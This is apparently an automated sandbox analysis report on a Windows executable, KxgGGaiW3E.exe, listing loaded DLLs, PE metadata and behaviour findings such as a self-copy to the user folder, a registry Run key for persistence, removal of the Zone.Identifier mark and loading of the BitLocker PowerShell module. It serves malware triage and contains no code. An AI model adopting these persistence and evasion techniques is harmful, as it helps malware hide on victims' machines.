Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: textshaping.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: textinputframework.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: ieframe.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: wkscli.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: mlang.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: policymanager.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: msvcp110_win.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: ieframe.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: wkscli.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A66AEDC-93C3-4ACC-BA96-08F5716429F7}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: KxgGGaiW3E.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: KxgGGaiW3E.exe

Static file information: File size 6679218 > 1048576

Source: KxgGGaiW3E.exe	Static PE information: Raw size of .managed is bigger than: 0x100000 < 0x14c200
Source: KxgGGaiW3E.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x12fc00

Source: KxgGGaiW3E.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KxgGGaiW3E.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KxgGGaiW3E.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KxgGGaiW3E.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KxgGGaiW3E.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KxgGGaiW3E.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: KxgGGaiW3E.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: KxgGGaiW3E.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: KxgGGaiW3E.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KxgGGaiW3E.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KxgGGaiW3E.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KxgGGaiW3E.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KxgGGaiW3E.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"			Jump to behavior

Source: KxgGGaiW3E.exe	Static PE information: section name: .managed
Source: KxgGGaiW3E.exe	Static PE information: section name: _RDATA
Source: KxgGGaiW3E.exe.0.dr	Static PE information: section name: .managed
Source: KxgGGaiW3E.exe.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30CFEBC push 83480000h; ret	0_2_00007FF7F30CFEC4
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70301FEBC push 83480000h; ret	13_2_00007FF70301FEC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 25_2_05C351E8 push esp; ret	25_2_05C35445

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe

File created: C:\Users\user\KxgGGaiW3E.exe

Jump to dropped file

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe

File created: C:\Users\user\KxgGGaiW3E.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe

File created: C:\Users\user\KxgGGaiW3E.exe

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KxgGGaiW3E			Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KxgGGaiW3E			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe:Zone.Identifier read attributes | delete

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
